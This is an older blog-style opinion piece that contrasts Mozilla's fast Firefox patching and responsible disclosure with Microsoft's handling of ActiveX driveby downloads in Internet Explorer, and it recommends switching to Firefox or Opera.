Mozilla has a history of issuing patches to Firefox and its other products within days of learning of a vulnerability. Often, the patch is issued before the public announcement of the vulnerability by the person that discovered it.
This is the way that vulnerability management should occur — the discoverer should allow the software company a chance to patch the software before telling the public (and the bad guys) about the security hole. This is totally different than the release in May 2006 by FrSIRT (the French Security Incident Response Team), who published exploit code while Mozilla was working with Greyhats Security Group, the discoverers, to solve the problem.
Microsoft, on the other hand, seems to let their security problems lie around and fester. After all, Active-X is still part of Internet Explorer.
Microsoft finally put up a roadblock to Active-X “driveby downloads” as of Windows XP Service Pack 2 — but they did not put any prevention into earlier IE versions. IE for WIndows XP SP2 is the only one getting fixed! Of course, later versions have preventive measures, too.
A driveby download occurs when your brower goes to a web page that wants to download an Active-X program. If you are not running at least XP Service Pack 2 and you are using I.E. as your browser, I.E. will merrily download the Active-X program and run it — without even asking. As of XPSP2, it asks first.
However, if you are running a version of Windows before Windows XP, or if you are running Windows XP and have not updated to SP2, then nothing stops the driveby download. If you need a reason to upgrade to Windows XP, this is it. Security is much better than Windows 98 or Windows Me.
Yes, I know Microsoft calls it an “Active-X Control” and not an Active-X Program. Some bright spin-doctor decided to use pretty, but misleading, terminology.
A rose is a rose by any other name. Anything that downloads and runs on your computer with the ability to write to your hard drive is a program. Ever wonder how all those trojans, downloaders, adware and popup generators got on your system?
Try using Firefox or Opera as your web browser. Save Internet Explorer for the things it can safely handle — like Windows Updates, which requires Active-X.